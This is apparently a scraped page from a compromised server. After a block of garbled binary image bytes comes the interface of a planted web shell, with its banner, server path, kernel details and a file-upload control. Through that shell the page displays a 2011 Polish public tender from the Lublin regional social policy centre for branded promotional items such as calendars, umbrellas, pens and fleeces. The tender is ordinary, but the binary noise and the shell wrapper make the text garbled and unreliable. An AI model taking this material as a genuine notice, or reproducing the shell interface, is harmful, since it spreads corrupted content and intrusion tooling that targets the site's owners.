JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110519/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110519/142793-N-2011.html

<p class="kh_header"><b>Lublin: wykonanie i dostarczenie materiałów promocyjnych dla projektu systemowego szkolenie i doradztwo podnoszące kwalifikacje pracowników instytucji pomocy i integracji społecznej</b><br>
<b>Numer ogłoszenia: 142793 - 2011; data zamieszczenia: 19.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Tomasza Zana 38, 20-601 Lublin, woj. lubelskie, tel. 81 528 76 50, faks 81 528 76 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie i dostarczenie materiałów promocyjnych dla projektu systemowego szkolenie i doradztwo podnoszące kwalifikacje pracowników instytucji pomocy i integracji społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu i przykładowa
wizualizacja	Opis artykułu	ilość	ilość próbek
1.	Kalendarz książkowy B 6 na 2012 r.

 	 Wymiary:  110 x 160 mm ( +- 5 mm dla każdego wymiaru)
	Kolor: czarny lub granatowy lub bordowy 
	Ilość: 150
	Opis: Kalendarz B6 dzienny, papier chamois układ: 1 dzień na 1 stronie, sobota i niedziela na 1 stronie, przed każdym miesiącem terminarz miesięczny druk: szaro-bordowy lub szaro-niebieski, kalendarium 5 języczne: PL, GB, D, RUS, FR, imieniny i święta, fazy księżyca, wschody i zachody słońca, na dole kalendarium plan całego roku mapy: na wyklejce z przodu mapa Europy, na wyklejce z tyłu mapa Polski część informacyjna: plan roczny 2011, 2012, 2013 plan urlopowy, jednostki miar, odległości między miastami, tel. numery kierunkowe, kalendarz stuletni, strefy czasowe, skorowidz od A do Z.wykończenie: blok kalendarza szyty oraz dodatkowo klejony, wzmocniony krepą, tasiemka oraz kapitałka w kolorze okładki, perforacja narożników kalendarz powinien zawierać adresy wszystkich placówek pomocy społecznej w woj. lubelskim w formie wkładki- maksymalnie 20 stron( ośrodki pomocy społecznej, powiatowe centra pomocy rodzinie, ośrodki wsparcia dla osób z zaburzeniami psychicznymi, ośrodki wsparcia doraźnego dla bezdomnych , schroniska i noclegownie) znajdują się na stronie Wydziału Polityki Społecznej  Lubelskiego Urzędu Wojewódzkiego. Wkładka ma być wkładana do kalendarza- z możliwością wyjmowania,  umieszczona w transparentnej zakładce przyklejonej do dolnego rogu okładki wewnątrz kalendarza. Loga mają być umieszczone naw kalendarzu - wkładka jest jedynie wydrukiem bazy teleadresowej. Wewnątrz kalendarza dane adresowe ROPS z nazwą projektu i informacją o współfinansowaniu treść nadruku w kolorze srebrnym ilub tłoczenia w oprawie: logo PO KL, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.	150
2.	Kalendarz na biurko na 2012 r.


 		Wymiary ok.:  125 x 199 mm w tym kalendarium: 125 x 175 mm
	Kolor: dowolny
	Ilość: 60
	Opis: Wygodny kalendarz stojący na biurko z przejrzystym kalendarium 
w układzie tygodniowym:  1 tydzień na 1 stronę z dużym obszarem do notowania  W kalendarzu zaznaczono święta i daty imienin. W dolnej części kalendarium przegląd aktualnego miesiąca. Treść nadruku w dolnej części kartonowej podstawy kalendarza stale widoczna 4 kolory: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS i adres www.rops.lubelskie.pl  , flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, nazwa projektu oraz informacja o współfinansowaniu.
	60
3.	Kalendarz jednodzielny na 2012 r.

 		Wymiary: główka 300 x 200 mm kalendarium 260 x 160 mm plecki 300 x 240 mm (+- 5 mm dla każdego wymiaru)
	Kolor: CMYK (4+0)
	Ilość: 150
	Opis:  
GŁÓWKA: Rodzaj: główka płaska, 
Wymiary: 300x200mm
Papier: KARTON ALASKA
Gramatura: 350gm2
Kolorystyka: CMYK (4+0)
Folia: matowa
Lakier UV: wybiórczo na wybrane elementy.
Uwagi: główka przedstawia pejzaż województwa lubelskiego.
PLECKI: Wymiary: 300x240mm
Papier: karton
Gramatura: 350gm2
Kolorystyka: CMYK (4+0)
Folia: matowa
Lakier UV:  wybiórczo na wybrane elementy
Górna część łączy się z główką kalendarza, a poniżej przyklejone jest kalendarium jednodzielne. Treść nadruku nad kalendarium stale widoczna 4 kolory:  logo POKL, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i informacja o współfinansowaniu. Treść nadruku pod kalendarium stale widoczna: dane teleadresowe ROPS w Lublinie.
KALENDARIUM:  Papier: offset
Gramatura: 80gm2
Kolorystyka: CMYK (3+0)
Folia: brak
Lakier UV: brak
Uwagi: m-c bieżący + poprzedni i kolejny. Kalendarium z imieninami w wersji kolorystycznej: czerwono-czarno- niebieskiej. Niedziele i święta są w kolorze czerwonym, soboty w kolorze niebieskim. Kalendarz posiada przesuwne plastikowe okienko wskazujące aktualną datę. 	150	
4.	Parasol składany automatyczny	Wymiary ok.: 96 x 54,5 cm (+- 1 cm dla każdego wymiaru)
	Kolor: granatowy, czarny, ecru 
	Ilość: 60 
	Opis: parasol składany, automatyczny poszycie i pokrowiec- nylon 190T, 8 brytów, pasek spinający na rzep, aluminiowe szyny z końcówkami z włókna szklanego i metalowymi kolcami, uchwyt z tworzywa sztucznego treść nadruku 1 kolor srebrny: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS  , flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i  informacja o współfinansowaniu.
	Uwagi: parasol granatowy:20 szt., czarny: 20 szt., ecru: 20 szt.
	60	1 szt.
5.	Teczka na dokumenty
 		Wymiary:  37 x 1 x 27 cm (+ - 5 mm)
	Kolor: czarny i granatowy
Ilość:  400
	Opis: materiał - poliester, z dwoma kieszeniami na zamek  oraz poręcznym uchwytem rączka i zamki koloru szarego  treść nadruku koloru szarego: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i informacja o współfinansowaniu. 
	Uwagi: kolor granatowy: 200 szt., kolor czarny: 200 szt.
	400
6.	Długopis
		Wymiary: długość 13 cm (+- 5 mm)
	Kolor: matowy granatowy i matowy srebrny
	Ilość: 1000
	Opis: długopis metalowy, przekręcany z chromowanym klipem końcówka od strony wkładu chromowana pod zakończeniem klipa dookoła średnicy chromowany element  o szerokości około 1 mm
  wkład długopisu wymienny  w kolorze niebieskim , stalówka ze stali nierdzewnej
 treść nadruku w kolorze szarym: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS , flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego .
	Uwagi: granatowy: 500 szt., srebrny: 500 szt.	1000	1 szt.
7.	Bluza polarowa męska

 		Wymiary:  L, XL
	Kolor: khaki i czarny 
	 Ilość: 30
	Opis: polar ze stójką, zapinany na długi zamek, dwie kieszenie z przodu, wykończenie antypilingowe, nie posiada ściągaczy,  gramatura: 280 gm2
 trwały nadruk  w kolorze czarnym( polar khaki)i szarym (polar khaki) umieszczony na przedniej, dolnej części bluzy: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego
	Uwagi: kolor khaki: 5 szt. XL i 5 sz. L
 kolor czarny: 10 szt. L i 10 szt. XL
 opakowanie jednostkowe musi zawierać informację o współfinansowaniu.	30	1 szt.
8.	Bluza polarowa damska

 		Wymiary: S, M, L
	Kolor:  szary, czarny i ecru
	 Ilość: 60
Opis.  polar ze stójką zapinany na długi zamek, krój podkreślający sylwetkę materiał: 100% poliester,  gramatura materiału: 300 gm2 , polar odporny na mechacenie, górny szew na obszyciu i szwy na ramionach, zakryty zamek błyskawiczny z przodu i przy kieszeniach trwały nadruk  w kolorze czarnym ( polar szary i ecru) i szarym ( polar czarny)umieszczony na przedniej, dolnej części bluzy: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: kolor ecru:  4 szt. S, 4 szt. M, 4 szt. L kolor szary: 6szt. S, 12 szt. M, 4 szt. L kolor czarny: 6 szt. S, 12 szt. M, 4 szt. L opakowanie jednostkowe musi zawierać informację o współfinansowaniu.	60	1 szt.
9.	Przezroczyste poncho przeciw-deszczowe
 
		Wymiary: średnica etui 6 cm (+- 5 mm)
	Kolor etui:  czerwony, niebieski,  jasnozielony
	 Ilość: 350
	Opis: Przezroczyste poncho przeciwdeszczowe z PE zapakowane w okrągłe etui z ABS z karabinkiem materiał- plastik, treść nadruku: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS i flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: poncho w etui zielonym: 150 szt., w etui czerwonym:  100 szt. i w etui niebieskim 100 szt.
	350	
10.	Opaska odblaskowa

 		Wymiary: 34 x 3 cm (+- 5mm dla każdego wymiaru)
	Kolor: żółty, pomarańczowy
	Ilość: 300
	Opis: wysokiej jakości samozaciskowa opaska odblaskowa budowa: blaszka samozaciskowa zalaminowana odblaskową folia pryzmatyczną, spód materiał typu flock łagodny dla dłoni treść czarnego nadruku: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i informacja  o współfinansowaniu.
	Uwagi: kolor żółty- 150 szt., kolor pomarańczowy- 150 szt.
	300	
11.	Smycz
 	Wymiary:  1 x 91 cm (+- 10% dla każdego wymiaru)
	Kolor: czarny + kolorowy nadruk
	Ilość: 400
	Opis: Smycz wykonana z taśmy atłasowej, gęsto tkanej, płaskiej, szerokość taśmy 1 cm (+- 10%), długość taśmy przed montażem 91 cm (+- 10%) wykonana metodą sublimacji. Smycz z plastikowym łącznikiem oraz karabińczykiem niklowanym typu rybka+ końcówka do telefonu z możliwością odpięcia jednostronnie  drukowana w pełnym kolorze- treść nadruku:  Regionalny Ośrodek Polityki Społecznej w Lublinie lub www.rops.lubelskie.pl oraz logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	400	
12.	Lusterko




		Wymiary:  5,8 x 5,8 x 1 cm (+- 5 mm dla każdego wymiaru)
	Kolor: czarny, czerwony
	Ilość: 350
	Opis: podwójne magnetyczne kwadratowe lusterko w  etui z materiału skóropodobnego, jedno z lusterek jest powiększające treść  tłoczenia na spodniej stronie etui: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: kolor czarny etui:  200 szt., kolor czerwony: 150 szt.	350	1 szt.
13.	Klip do notatek

 		Wymiary: 11 x2,2 x 2,2 cm (+- 2 mm dla każdego wymiaru)
	Kolor: srebrny
	Ilość: 400
	Opis: klip do notatek wykonany z aluminium z metalową klamrą nadruk  na jednym z boku sześcianu: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.	400	
14.	Latarka samochodowa

 		wymiary ok.:  3,5 x 10,6 cm (+- 5 mm dla każdego wymiaru)
	kolor: srebrno- czarny
	ilość: 150 
	opis: latarka LED: 3, w komplecie czarny pokrowiec zapinany na rzep, latarka wykonana z metalu i gumy wyposażona w trzy alkaliczne baterie typu paluszki AAAna przedniej części latarki znajduje się włącznik, gumowy uchwyt umieszczony  dookoła średnicy latarki do dekielka od baterii zamocowany jest pasek na rękę o długości około 8,5 cm na czarnym pasku srebrny nadruk o treści: www.rops.lubelskie.pl oraz logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: opakowanie jednostkowe musi zawierać informację o współfinansowaniu.
	150	1 szt.
15.	Torba na zakupy

 

		Wymiary: 41 X 37,5 cm (+ - 1 cm dla każdego wymiaru)
	Kolor: czarny
	Ilość: 300
	Opis: Bawełniana torba na zakupy 100grm2 z  rączkami o długości około 38 cm umożliwiającymi swobodne założenie na ramię  szary nadruk w dolnej części torby: Regionalny Ośrodek Polityki Społecznej w Lublinie lub www.rops.lubelskie.pl oraz logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i informacja o współfinansowaniu.

	300	
16.	Pamięć Flash USB 8 GB


 		Wymiary: 9,5 x 3 cm (+ - 10% dla każdego wymiaru)
	Kolor: czarny, brązowy
	Ilość: 100
	Opis: wysokiej jakości pamięć USB w skórzanej oprawie zapinanej na magnes o pojemności 8GB + smycz interfejs: USB 2. 0 kompatybilne z USB 1. 1, zabezpieczenie hasłem, hot plug and play, system operacyjny: Windows98NTME2000XPVistaWin7. Obudowa: skórametal treść  tłoczenia: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: kolor czarny: 50 szt., kolor brązowy: 50 szt.

	100	1 szt.
17.	Zestaw piśmienniczy

 
 		Wymiary: 18.1 x 7.2 x 3.5 cm (+ - 5 mm dla każdego wymiaru)
	Kolor: czarnysrebrny
	Ilość: 150
	Opis: metalowy cienkopis z czarnym tuszem i przekręcany długopis z niebieskim wkładem. Błyszczący czarny lakier i błyszczące chromowane wykończenie. Zestaw umieszczony w składanym etui z PU zapinanym na klapkę ze szlufką treść nadruku w srebrnym kolorze na etui: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego . Wewnątrz etui nadruk informujący o współfinansowaniu.	150	1 szt.
18.	Notatnik

 

 		Wymiary: 15 x 10,5 x 1,5 cm (+- 10 mm dla każdego wymiaru)
	Kolor: czarny , burgund
	Ilość: 200
	Opis:  80-kartkowy notes w linie z przekręcanym długopisem o niebieskim wkładzie, umieszczonym na dwóch gumkach z prawej strony notesu oba elementy- notatnik i długopis w stylu skóry krokodyla pakowane w  czarne ozdobne pudełko z przezroczystym wieczkiem treść nadruku w kolorze czarnym na okładce: logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego. Wewnątrz notesu nadruk: logo ROPS lub www.rops.lubelskie.pl, nazwa projektu oraz informacja o współfinansowaniu.
	Uwagi: notatnik w kolorze burgund:  100 szt., czarny- 100 szt.
	200	1 szt.
19.	Bombka na stojaku
 		Wymiary: średnica bombki 10 cm (+- 1 cm)
	Kolor: ciemno niebieski
	Ilość: 50
	Opis: elegancka, szklana matowa bombka choinkowa ozdobiona srebrnym brokatowym świątecznym motywem w zestawie stojak metalowy w kolorze srebrnym o kolistej podstawie i  półkolistym ramieniu na którym zawiesza się bombkę treść nadruku w kolorze srebrnym wzdłuż dolnej części bombki: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: bombka ma być pakowana jednostkowo.	50	
20.	Portfel damski

 		Wymiary: 16,5 x 10 cm (+- 5 mm dla każdego wymiaru)
	Kolor: czerwony
	Ilość: 70
	Opis: portfel skórzany wyposażony w miejsce na bilon zapinane na bigiel, dwie kieszenie na banknoty, około 10 miejsc na karty kredytowe, 3 kieszenie na dokumenty w tym jedna transparentna zapakowany w eleganckie pudełko treść tłoczenia  na wewnętrznej stronie portfela:  logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: opakowanie jednostkowe musi zawierać informację o współfinansowaniu.
	70	1 szt.
21.	Zestaw do kawy
 
 		Wymiary: 22,5 x 18 x 8 cm (+ - 5 mm dla każdego wymiaru)
	Kolor: białyczarny
	Ilość: 100
	Opis: Elegancki 2-częściowy komplet do kawy. Dwa porcelanowe kubki o pojemności 180 ml w czarno- białe poziome paski (wnętrze kubków jest białe) i dwa czarne na brzegach spodeczki z białym środkiem całość zapakowana w dobrane kolorystycznie ozdobne pudełko (pudełko w kolorze czarnym, wieczko w czarno - białe pasy). Nadruk w kolorze czarnym w centralnej białej części spodka: logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
	Uwagi: opakowanie jednostkowe musi zawierać informację o współfinansowaniu.
	100	1 szt.
22.	Kosmetyczka


		Wymiary: 18 x 12 x 6 cm (+- 5 mm dla każdego wymiaru)
	Kolor:  czerwony i ciemny brąz
	Ilość: 50
	Opis: Kosmetyczka wykonana ze skóry, zapinana na zamek błyskawiczny w kolorze kosmetyczki, wewnątrz znajduje się dobrana kolorystycznie podszewka  tłoczenie zlokalizowane w dolnej części kosmetyczki o treści : logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego.
Uwagi: kolor ciemny brąz 25 szt., kolor czerwony: 25 szt. opakowanie jednostkowe musi zawierać informację o współfinansowaniu.	50	1 szt.
23.	Naklejki		Wymiary: 97 x 42,3 mm
	Kolor: 4 kolory
	Ilość : 100 szt.
	Opis: naklejki papierowe laminowane folią z połyskiem lub matową. Na naklejce muszą się znajdować dwa logotypy: Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz następujący komunikat: Zakup współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego	100	1 szt.
24.	Naklejki		Wymiary: 97 x 42,3 mm
	Kolor: 4 kolory
	Ilość : 100 szt.
	Opis: naklejki papierowe, na których muszą się znajdować: logo Programu Operacyjnego Kapitał Ludzki, logo ROPS,  flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz nazwa projektu i informacja o współfinansowaniu.	100	1 szt.

Zdjęcia produktów są przykładowe, poszczególne artykuły będą oceniane według opisu.

Wszystkie materiały promocyjne będące przedmiotem niniejszego przetargu muszą być oznaczone zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. Pełen zakres wytycznych wraz z odpowiednimi plikami graficznymi znajduje się na stronie internetowej pod adresem www.efs.lubelskie.plfrontpageget103.

Zamawiający zapewnia następujące materiały:
- znaki graficzne Regionalnego Ośrodka Polityki Społecznej
- herb województwa lubelskiego
Wykonawca zobowiązuje się do konsultowania z Zamawiającym projektów graficznych oznaczeń dotyczących przetargu. Zamawiający zastrzega sobie prawo do akceptacji ostatecznych rozwiązań graficznych dotyczących oznaczeń materiałów promocyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.46.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące:
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b)	posiadania wiedzy i doświadczenia;
c)	dysponowania odpowiednim potencjałem technicznym oraz zasobami zdolnymi             do wykonania zamówienia;
d)	sytuacji ekonomicznej i finansowej 
  oraz nie podlegają wykluczeniu z postępowania zgodnie z art. 24 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonał w ostatnich 3 latach przed upływem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej 1 dostawy materiałów promocyjnych o wartości minimum 50.000,00 złotych i przedstawi potwierdzenie należytego wykonania dostawy.Spełnienie tego warunku będzie oceniane na podstawie Wykaz wykonanej co najmniej 1 dostawy materiałów promocyjnych o wartości        50.000,00 złotych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich przedmiotu, dat wykonania i odbiorców, wartości i załączenia dokumentów potwierdzających, że usługa została wykonana należycie. Wzór wykazu stanowi załącznik nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

